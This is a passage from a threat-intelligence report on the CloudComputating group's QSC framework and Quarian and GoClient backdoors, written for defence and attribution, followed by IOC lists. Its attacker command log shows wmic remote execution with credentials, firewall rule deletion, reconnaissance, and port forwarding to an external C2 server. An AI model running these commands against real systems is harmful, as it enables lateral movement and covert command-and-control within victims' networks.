update.exe (MD5 d99d97bb78929023d77d080da1b10f42) was configured to use a local IP address (pivot machine address 172.17.99[.]5:8080) as a C2 address. Similarly, the sample update.exe (MD5 7f89a83cda93ed3ddaa4315ea4ebba45) was configured to use an internal IP address (pivot machine address 172.17.99[.]5:80) but run on port 80. This might suggest either that these samples were deployed on machines without internet access or that the threat actor decided to channel all C2 communication through selected machines for other reasons.
Just after executing each instance of the above QSC framework samples on the remote machine, the attacker executed
%windir%\l2schemas\pf.exe on the pivot machine. While we could not obtain a copy of pf.exe, it seemed to perform port forwarding operations to forward any traffic coming to the pivot machine’s local IP address on port 8080/80 to the remote C2 server address 108.61.206[.]206 on port 8080.wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c %temp%\update.exe"

%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080

tasklist

findstr pf.exe

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c taskkill /im net.exe /f"

net view \\<internal_ip>

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c tasklist >>
D:\fileserver\public\applications\drivers\apple\1.txt"

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c taskkill /im update.exe /f >>
D:\fileserver\public\applications\drivers\apple\1.txt"

taskkill /im pf.exe /f

netsh firewall show state

netsh firewall show config

netsh firewall delete portopening tcp 8080

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c %temp%\update.exe"

%windir%\l2schemas\pf.exe tcp listen:127.0.0.1:80 conn:108.61.206[.]206:8080"

tasklist

findstr pf.exe

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c taskkill /im update.exe /f >>
D:\fileserver\public\applications\drivers\apple\1.txt"

netstat -anb
netstat -anb -p tcp

netsh firewall show state

netstat -anb -p tcp
findstr 15001

netstat -anb -p tcp
findstr 8080

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c %temp%\update.exe"

%windir%\l2schemas\pf.exe tcp listen:127.0.0.1:8080 conn:108.61.206.206:8080

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c netstat -ano -p tcp
>>D:\fileserver\public\applications\drivers\apple\1.txt"

ping -n 1 108.61.206[.]206

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create
"system32\cmd.exe /c ping -n 1 40.113.110[.]67
>>D:\fileserver\public\applications\drivers\apple\1.txt"

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c tasklist
>>D:\fileserver\public\applications\drivers\apple\1.txt"

ping -n 1 40.113.110[.]67

taskkill /im pf.exe /f

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c ping -n 1 <internal_ip_2>
>>D:\fileserver\public\applications\drivers\apple\1.txt"

%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080

net use \\<internal_ip_2> <user_password> /u:<user_name>

tasklist

findstr update.exe

net use * /d /y

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "%windir%\l2schemas\update.exe"

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c tasklist
>>D:\fileserver\public\applications\drivers\apple\1.txt"

"wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c netstat -ano -p tcp
>>D:\fileserver\public\applications\drivers\apple\1.txt"

%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080

Attribution

We found multiple artifacts that helped us in attributing the QSC framework and the activity described above to the CloudComputating (aka BackdoorDiplomacy, Faking Dragon) group:

• On February 23, 2024, our product detected the presence of the file C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b). This DLL file is Quarian backdoor version 3 (aka Turian), compiled on Thursday, 28.04.2022 02:59:40 UTC. Quarian backdoor version 3 (aka Turian) was used to deploy the QSC framework and GoClient backdoor as described above.
• The Quarian backdoor sample C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b) was configured to use the domain “proxy.oracleapps[.]org”, which was previously used by BackdoorDiplomacy as reported by Bitdefender in their report, “Cyber-Espionage in the Middle East: Investigating a New BackdoorDiplomacy Threat Actor Campaign“.
• The Quarian backdoor sample code is protected by VMProtect. After unpacking it, our KTAE (Kaspersky Threat Attribution Engine) attribution engine found a high degree of similarity with the CloudComputating group’s other malware.
  
  Kaspersky Threat Attribution Engine analysis
• We observed that the Quarian backdoor V3 sample C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b) shell command created a copy of cmd.exe in the Windows directory with task.exe as the filename.
• In this campaign, we found C:\ProgramData\USOShared\ to be a common directory which contained the QSC framework, the GoClient backdoor, Quarian backdoor version 3 binaries and tools used in reconnaissance and post-compromise activity. This also helps in tracing all the implants and tools to the CloudComputating group. Some of the tools, such as TailorScan and StowProxy, are known to have been used by CloudComputating in past activity discovered in the Middle East.

  MD5	FilePath	Comment
  7a5a354b4ee40d694d7935f5 061fbd06	C:\ProgramData\USOShared \msvcen.exe	QSC framework
  5eba7f8a9323c2d9ceac9a0f 91fad02f	C:\ProgramData\USOShared \intop64.exe	GoClient backdoor
  0fe65bbf23b0c589ad462e84 7e9bfcaf	C:\ProgramData\USOShared \ts6.exe	TailorScan. Executed by Quarian backdoor
  50be5e66a94a25e61d61028d b6a41007	C:\ProgramData\USOShared \agt.exe	StowProxy. Executed by Quarian backdoor
  6a09bc6c19c4236c0bd8a019 53371a29	C:\ProgramData\USOShared \pdp.exe	ProcDump. Executed by Quarian backdoor
  efbdfeea6ececf08f24121d5 d444b751	C:\ProgramData\USOShared \to0.exe	Executed by Quarian backdoor. Could not get copy of the sample
  567b921d9757928a4bd137a0 8cfff06b	C:\ProgramData\USOShared \fn.exe	Executed by Quarian backdoor. Could not get copy of the sample

Conclusions

Our investigation has revealed a significant shift in the tactics of the CloudComputating group, marked by their adoption of the QSC framework alongside the previously identified Quarian backdoor and its variants. Our telemetry data indicates that the group has initiated limited yet targeted campaigns using QSC framework and focusing specifically on the telecommunication sector. Additionally, in response to detection of the Quarian backdoor, the group has begun deploying a protected version. The usage of the QSC framework suggests a strategic change in their toolkit, serving as a secondary means to maintain access within compromised networks. This evolution underscores the group’s adaptability and emphasizes the importance of continuous monitoring of its future activities.

QSC is a modular framework, of which only the initial loader remains on disk while the core and network modules are always in memory. Using a plugin-based architecture gives attackers the ability to control which plugin (module) to load in memory on demand depending on the target of interest.

IOCs

QSC framework Loader
d88ef85941ec6be99fd1e38ad5702bae
6da5b3bc89a6d83bc80b462c29f1715b
de4e76c9c5916570e75411aab7141f73

QSC framework executable
c687b0b8a8cc86638b53ca6d66ede382
d3749cef1a91a0a80a013d5a8b2c28d1
d99d97bb78929023d77d080da1b10f42
4dde0699dd21b16afa38be92efcfec61
112820e9a87239c2e11ead80759bef85
7a5a354b4ee40d694d7935f5061fbd06
0f0b8d2f648a4609cf2f6decd3407c8c
3dbc5b5e5f6713b9a6b838da25075187

GoClient backdoor
5eba7f8a9323c2d9ceac9a0f91fad02f
9da4b88a6b80db85c102ce8c841f0a5c
b581c0835934460719181afd9abf5a4e

Quarian backdoor version 3 (aka Turian)
97b0a8e8d125e71d3d1dd8e241d70c5b
a83a869df90acb5344a6e9b11e5f6e74

Batch scripts to deploy QSC framework DLL
76caef183ad0c869f3cb8b474f6a0fd7
3d62eee8d7fe5d6c86946a4e14db784f

Batch scripts dropped by GoClient backdoor to collect victim information
23351bc0b2be2ffb946de2bf7770df2e
23313406b64e1d0e8ec4a3c173ceda21

Tools used in post-compromise activity
b09cf30e7f0e326c9127047bdf518d05
eaff84466e086e9ca204e0548af3fbeb
ee4cb0891056c89b61b3ff3c8040a994
efbdfeea6ececf08f24121d5d444b751
567b921d9757928a4bd137a08cfff06b

File paths
C:\Windows\L2Schemas\update.exe
C:\Windows\L2Schemas\update64.exe
C:\ProgramData\USOShared\msvcen.exe
c:\ProgramData\package cache\{d401961d-3a20-3ac7-943b-6139d5bd490a\dwn.exe
C:\Windows\System32\audio.dll
C:\Windows\System32\rasautosvc.dll
C:\Windows\L2Schemas\audio.dll
C:\programdata\usoshared\intop64.exe
C:\ProgramData\usoprivate\updatestore\intop64.exe
C:\ProgramData\package cache\{010792ba-551a-3ac0-a7ef-0fab4156c382}v12.0.40664\csrs.exe
C:\Windows\SysWOW64\appmgmt.dll
C:\Windows\L2Schemas\w3wpt.exe
C:\Windows\L2Schemas\we.exe
C:\Windows\L2Schemas\pf.exe
C:\Windows\L2Schemas\pt.exe
C:\Windows\L2Schemas\onlytcp.exe
C:\ProgramData\USOShared\to0.exe
C:\ProgramData\USOShared\fn.exe
C:\Windows\SysWOW64\drivers\c.bat
C:\Windows\SysWOW64\drivers\c.bat
C:\Windows\Temp\c.bat
c:\inetpub\temp\1.bat
C:\Windows\L2Schemas\E.bat

PDB paths
C:\Users\abc\Desktop\vs\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\qscexec\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\pig\Documents\qs-domainless\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\loader\x64\release\loader.pdb

Domains and IPs
www.numupdate[.]com
www.pubsectors[.]com
www.delhiopera[.]com
asistechs[.]com
sanchaar[.]net
108.61.206[.]206
www.birdsvpn[.]com
newsinlevel[.]cc

securelist.com/cloudcomputatin…